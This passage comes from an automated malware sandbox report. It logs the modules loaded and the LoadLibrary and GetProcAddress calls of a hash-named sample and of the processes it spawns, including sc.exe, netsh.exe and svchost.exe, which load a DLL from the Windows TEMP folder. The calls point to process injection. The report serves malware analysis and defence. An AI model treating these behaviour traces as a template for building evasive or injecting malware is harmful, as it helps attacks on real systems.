\"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 77250000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b4b0000\n \"ulhofeim.exe\" loaded module \"GDI32.DLL\" at base 75df0000\n \"ulhofeim.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77480000\n \"ulhofeim.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70570000\n \"ulhofeim.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ulhofeim.exe\" loaded module \"KERNEL32\" at base 77250000\n \"ulhofeim.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ulhofeim.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b4b0000\n \"ulhofeim.exe\" loaded module \"KERNEL32.DLL\" at base 77250000\n \"ulhofeim.exe\" loaded module \"WS2_32.DLL\" at base 75f50000\n \"ulhofeim.exe\" loaded module \"DBGHELP.DLL\" at base 6f220000\n \"ulhofeim.exe\" loaded module \"USER32.DLL\" at base 75f90000\n \"ulhofeim.exe\" loaded module \"ADVAPI32.DLL\" at base 771a0000\n \"ulhofeim.exe\" loaded module \"SHELL32.DLL\" at base 761b0000\n \"ulhofeim.exe\" loaded module \"OLEAUT32.DLL\" at base 75e40000\n \"ulhofeim.exe\" loaded module \"MSVCR100.DLL\" at base 69860000\n \"ulhofeim.exe\" loaded module \"SSPICLI.DLL\" at base 750c0000\n \"ulhofeim.exe\" loaded module \"RPCRT4.DLL\" at base 75570000\n \"ulhofeim.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 774a0000\n \"ulhofeim.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750e0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70570000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 77250000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6c940000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6bfb0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 77250000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6b470000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6b340000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 69f70000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77250000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6b460000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6b130000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6d960000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6b1e0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 69f60000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 69f40000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 697d0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 684d0000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 75570000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 69890000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 69f10000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 69860000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 68350000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 69760000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 65200000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 76e00000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75130000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 740a0000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74c40000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 75f90000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75670000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6bc30000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 771a0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 774a0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 774a0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 774a0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 774a0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 749d0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 751d0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6f880000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75550000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74810000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74910000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 75e40000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70570000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 77250000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b4b0000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 73420000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73590000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 75570000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 734a0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 738c0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73230000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 774a0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73200000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74c00000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74ac0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 731f0000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75f50000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 734c0000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71980000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 750c0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 774a0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74760000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002544)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004276)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004276)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004276)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004276)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003996)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00003996)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003996)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003996)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003996)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003996)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002944)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002340)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002340)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002972)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002972)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002972)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002972)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00002972)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002972)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002972)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002972)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002972)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00002544)\n 